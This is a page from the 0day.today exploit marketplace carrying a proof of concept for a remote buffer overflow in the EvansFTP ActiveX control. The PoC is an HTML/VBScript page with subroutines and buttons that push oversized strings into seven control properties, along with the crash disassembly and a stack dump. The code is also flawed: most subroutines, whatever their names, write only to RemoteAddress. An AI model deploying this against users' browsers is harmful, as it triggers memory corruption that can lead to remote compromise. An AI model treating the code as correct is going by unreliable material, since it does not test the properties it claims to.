0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
EvansFTP (EvansFTP.ocx) Remote Buffer Overflow PoC
================================================== EvansFTP (EvansFTP.ocx) Remote Buffer Overflow PoC ================================================== <HTML> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:7E864D3E-3E6A-48F0-88AF-CEAEE322F9FD' id='beard' /> <HEAD> <TITLE>EvansFTP (EvansFTP.ocx) Remote Buffer Overflow PoC</TITLE> </HEAD> <BODY> [+] Application : EvansFTP ActiveX <br> [+] CompanyName : Evans Programming <br> [+] Description : Multi-threaded asynchronus Active-X FTP Control<br> [+] Lib GUID : {DA3C77F4-8701-11D4-908B-00010268221D}<br> [+] Exploit : Remote BoF (PoC)<br> [+] Author : Bl@ckbe@rD // Blackbeard-sql{a.t}Hotmail{dot}fr<br><br> [+] Object Safety Report :<br> Report for Clsid: {7E864D3E-3E6A-48F0-88AF-CEAEE322F9FD}<br> RegKey Safe for Script: Faux<br> RegKey Safe for Init: Faux<br> Implements IObjectSafety: Vrai<br> IDisp Safe: Safe for untrusted: caller,data <br> IPStorage Safe: Safe for untrusted: caller,data <br><br> RegKey Safe for Script: Faux<br> RegkeySafe for Init: Faux<br> KillBitSet: Faux<br> <br><br> The Proprieties (RemoteAddress,ProxyPrefix,ProxyName,Password,ProxyBypassList,LoginName,CurrentDirectory) suffers from Buffer Overflow when we pass long strings in fact : <br> 1- RemoteAddress suffers from a BoF when we pass a string over 2068 <br> 2- ProxyPrefix suffers from a BoF when we pass a string over 1044 <br> 3- ProxyName suffers from a BoF when we pass a string over 1044 <br> 4- Password suffers from a BoF when we pass a string over 1044 <br> 5- ProxyBypassList suffers from a BoF when we pass a string over 1044 <br> 6- LoginName suffers from a BoF when we pass a string over 1044 <br> 7- CurrentDirectory suffers from a BoF when we pass a string over 1044 <br><br> DisASM RemoteAddress Crash :<br><pre> 7C809EEC MOV AL,[EDX] (KERNEL32.dll) 7C809ED4 TEST EDX,EDX 7C809ED6 JE 7C80C858 7C809EDC LEA EDI,[EDX+EAX-1] 7C809EE0 CMP EDI,EDX 7C809EE2 JB 7C80C858 7C809EE8 AND DWORD PTR [EBP-4],0 7C809EEC MOV AL,[EDX] <--- CRASH EBP+8 FEEEFEEE Stack Dump: 13FC18 A7 F3 01 66 EE FE EE FE 04 00 00 00 02 00 00 00 </pre> <script language='vbscript'> Sub RemoteAddress arg1=String(2068, "A") beard.RemoteAddress = arg1 End Sub Sub ProxyPrefix arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub Sub ProxyName arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub Sub Password arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub Sub ProxyBypassList arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub Sub LoginName arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub Sub CurrentDirectory arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub </script><br><br> <INPUT TYPE="button" VALUE="RemoteAddress PoC" ONCLICK=RemoteAddress()> <INPUT TYPE="button" VALUE="ProxyPrefix PoC" ONCLICK=ProxyPrefix()> <INPUT TYPE="button" VALUE="ProxyName PoC" ONCLICK=ProxyName()> <INPUT TYPE="button" VALUE="Password PoC" ONCLICK=Password()> <INPUT TYPE="button" VALUE="ProxyBypassList PoC" ONCLICK=ProxyBypassList()> <INPUT TYPE="button" VALUE="LoginName PoC" ONCLICK=LoginName()> <INPUT TYPE="button" VALUE="CurrentDirectory PoC" ONCLICK=CurrentDirectory()><br><br> Brought to You by Bl@ckbe@rD<br> Peace xD </BODY> </HTML> # 0day.today [2024-12-24] #